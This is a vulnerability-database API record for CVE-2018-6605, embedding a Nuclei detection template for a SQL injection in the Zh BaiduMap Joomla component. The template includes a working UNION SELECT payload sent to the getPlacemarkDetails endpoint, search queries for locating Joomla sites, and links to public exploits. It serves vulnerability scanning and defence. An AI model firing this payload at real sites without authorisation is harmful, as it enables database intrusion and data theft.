{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-6605/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-6605/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-6605/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-6605/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-6605/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-6605"},"sightings":{"href":"/api/v1/sightings/cve-2018-6605"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-6605.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-6605\n\ninfo:\n  name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n  impact: |\n    Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Joomla installation.\n  remediation: |\n    Remove the vulnerable Zh BaiduMap component or upgrade to a patched version.\n  reference:\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py\n    - https://www.exploit-db.com/exploits/43974\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-6605\n    cwe-id: CWE-89\n    epss-score: 0.57702\n    epss-percentile: 0.99043\n    cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\\!:*:*\n  metadata:\n    max-request: 1\n    vendor: zh_baidumap_project\n    product: zh_baidumap\n    framework: joomla\\!\n    fofa-query:\n      - app=\"Joomla!-网站安装\"\n      - app=\"joomla!-网站安装\"\n  tags: cve,cve2018,joomla,sqli,joomla\\!,zh_baidumap_project,vkev,vuln\nvariables:\n  num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails\"\n\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n    body: \"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"{{md5(num)}}\"\n          - \"dataexists\"\n        part: body\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d1d8223e9cd9988137e9e8781b04dc1e2e2073931d6dc48a652e11e4d274bb35022022285ccdb7218ec9618b64f3b8874249703072f174dd7785ada75e916ad476cc:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2018-6605"}